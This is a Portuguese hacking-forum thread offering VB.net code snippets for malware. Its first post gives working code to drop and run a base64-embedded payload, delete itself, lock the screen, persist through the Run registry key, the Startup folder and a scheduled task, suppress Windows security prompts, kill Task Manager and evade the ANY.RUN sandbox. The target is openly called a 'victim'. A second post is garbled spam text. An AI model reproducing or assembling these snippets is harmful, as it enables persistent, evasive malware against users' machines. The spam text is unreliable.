COVIL HACKER

, ! .

» COVIL HACKER » Malware » Trechos de código VB.net para malware

Trechos de código VB.net para malware

: 1

1 2 2

1

  • 1z2x3c4v5b6n7m
  • 1z2x3c4v5b6n7m
  • : 2022-12-21
  • : 0
  • : 1394
  • : [+0/-0]
  • : [+0/-0]
  • :
    5 23
  • :
    2024-07-14 00:25:28

Solte e execute o arquivo de Base64:

Primeiro, converta sua carga para base64 em https://tomeko.net/online_tools/file_to_base64.php

Agora o trecho de código (requer Imports System.IO ):

Código:
Dim byt As Byte() = Convert.FromBase64String("")
IO.File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\" & "example.exe", byt)
Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\" & "example.exe")
   

Certifique-se de substituir a área em branco pela string convertida.

Autoexclusão:

Código:
Dim piDestruct As ProcessStartInfo = New ProcessStartInfo()

piDestruct.Arguments = "/C choice /C Y /N /D Y /T 3 & Del " _
& Application.ExecutablePath
piDestruct.WindowStyle = ProcessWindowStyle.Hidden
piDestruct.CreateNoWindow = True
piDestruct.FileName = "cmd.exe"

Process.Start(piDestruct)

Application.Exit()

Faz o que diz, sai e apaga a si mesmo.

Impedir ALT+F4 no formulário:

Código:
    Protected Overrides ReadOnly Property CreateParams() As CreateParams
        Get
            Dim cp As CreateParams = MyBase.CreateParams
            Const CS_NOCLOSE As Integer = &H200
            cp.ClassStyle = cp.ClassStyle Or CS_NOCLOSE
            Return cp
        End Get
    End Property

Isso impedirá que alguém use ALT+F4 para fechar sua janela. Útil para bloqueadores de tela.

Formulário de foco:

Código:
        Me.Activate()
        Me.Focus()

Outro snippet útil para screenlockers, coloque isso em um timer com um intervalo, não muito baixo, pois reorienta completamente a janela.
Combinado com o snippet Prevent ALT + F4, ele se concentrará até mesmo no gerenciador de tarefas e na barra de tarefas.

Inicialização do registro:

Código:
My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)

Define seu programa no registro para ser executado automaticamente. (Mostra na guia de inicialização no gerenciador de tarefas)

Copiar a si mesmo para a inicialização:

Código:
        If IO.File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\example.exe") Then
            ''Not doing anything here, but you can if you want.
        Else
            IO.File.Copy(Application.ExecutablePath(), Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\example.exe")
        End If

Copia seu programa para a pasta de inicialização. (Mostra na guia de inicialização no gerenciador de tarefas)

Impedir "Tem certeza de que deseja executar este software?"

Código:
        Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User)

Você deve usar isso com qualquer método de inicialização para executá-lo sem um alerta.

Anti Taskmgr:

Código:
        Dim process As Process
        For Each process In Process.GetProcessesByName("taskmgr")
            Try
                process.Kill()
            Catch ex As Exception
            End Try
        Next

Você deve colocar isso em um cronômetro com um intervalo baixo, também pode alterar o "taskmgr" para qualquer nome .exe como chrome.
Também é possível fazer com que este finalize o aplicativo quando ele detecta que um é iniciado.
Por exemplo, alterar process.Kill() para Application.Exit() fará com que o programa pare quando o taskmgr for aberto.
(Boa persistência com tarefas agendadas se a vítima for abrir o taskmgr com frequência e for paranóica.)

Detectar sandbox ANY.RUN:

Código:
        If Environment.UserName = "admin" And System.Windows.Forms.SystemInformation.ComputerName = "USER-PC" Then
            ''ANY.RUN was detected.
            Me.Close()
        Else
           ''ANY.RUN was not detected here.
           
        End If

Detecta a caixa de areia ANY.RUN, se for detectada, fechará. Pode causar falsos positivos com instalações de configuração completamente padrão.

Atividades agendadas:

Código:
                    Interaction.Shell(("schtasks /delete /tn Example /f"), AppWinStyle.Hide, True, &H1388)
                    Interaction.Shell(("schtasks /create /sc minute /mo 1 /tn Example /tr " & AppDomain.CurrentDomain.BaseDirectory & IO.Path.GetFileName(Application.ExecutablePath)), AppWinStyle.Hide, True, &H1388)

Isso agendará seu programa para iniciar a cada minuto em qualquer inicialização. Você também pode alterar "Exemplo" para qualquer nome que desejar.

Se você preferir C# em vez de VB.net, pode tentar converter o código aqui: https://converter.telerik.com/
Deparou-se com erros? Posso tentar consertar para você.

Estes são trechos básicos que peguei/criei ao longo dos anos ao experimentar a codificação de malware. Aproveitar.

0

2

  • xarzes
  • : 2024-02-04
  • : 0
  • : 1377
  • : [+0/-0]
  • : [+0/-0]
  • :
  • :
    2024-04-24 07:51:57

«Мас84BettBettСветШмакMaxiАндрюстиMPEGPaulCant6329DunsFiskGreg7842DekoPata(ИспСодегоро
МартСандИллюIronBarbLacaPeteсертWongКазиAromБариИкраHenrOreaShamDeanвзсчИванЭхерначаStev
eXacGezaобслStewФормFiscигруNintWindлист1:16SabrКремСивоГукаInteRossЧуроCharГорбНемчангл
АртуFranСолосертNintСвирDiscWindActiАндрcoopGuitPROLГрожWindJeweNeve4601ЛаврШервBianпеда
DecoавтоJohnБейзArtsрезиArtsМиниЛихаRichErleWindТуниFyodElisШевчRobiразмMargWindSuprElis
DolbEldeбатаCome(ОзвСредKingгероE411DAXXCataClimРоссСтепРокиinfl8998ChicЧайкРоссДиамOlme
газоDomePhilJuveAtlaVocaValiинстинстWindпалоКитаBridWindWindPhilDigiмузыChouIncaцветархи
PeteГусеВэйСНазаоргаDaniЛитРЛитРballVIIIHomoоднаЛесмRudoRefrпробMaybGiovBogdPiecLookЦент
ЛьвоLectколлJerrThriпрогNancвещеЗацеТихоСмирКалиСодеЛебеNBAcчитаГусеБелоCommAlleСомеДруж
ЛебеDMBBкниж1920ФормJohnOverE411E411E411КисеКамыФормБелоTodoлистGutmMaryiPodфакуФофастру
tuchkasхудоИван

0

: 1

» COVIL HACKER » Malware » Trechos de código VB.net para malware

|